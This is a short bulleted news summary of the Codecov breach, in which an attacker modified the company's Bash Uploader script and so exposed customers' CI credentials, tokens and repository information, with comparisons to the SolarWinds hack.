- Codecov’s platform is used to test software code for vulnerabilities, and its 29,000 clients include Atlassian, Proctor & Gamble, GoDaddy, and the Washington Post.
- In a statement on the company’s website, Codecov CEO Jerrod Engelberg acknowledged the breach and the federal investigation, saying someone had gained access to its Bash Uploader script and modified it without the company’s permission.
- The modified version of the tool could have affected:
- Any credentials, tokens, or keys that our customers were passing through their CI runner that would be accessible when the Bash Uploader script was executed.
- Any services, datastores, and application code that could be accessed with these credentials, tokens, or keys.
- The git remote information (URL of the origin repository) of repositories using the Bash Uploaders to upload coverage to Codecov in CI.
- Although the breach occurred in January, it was not discovered until April 1st, when a customer noticed something was wrong with the tool.
- While the breadth of the Codecov breach remains unclear, Reuters notes that it could potentially have a similar, far-reaching impact as the SolarWinds hack of late last year.
– Kim Lyons | April 18, 2021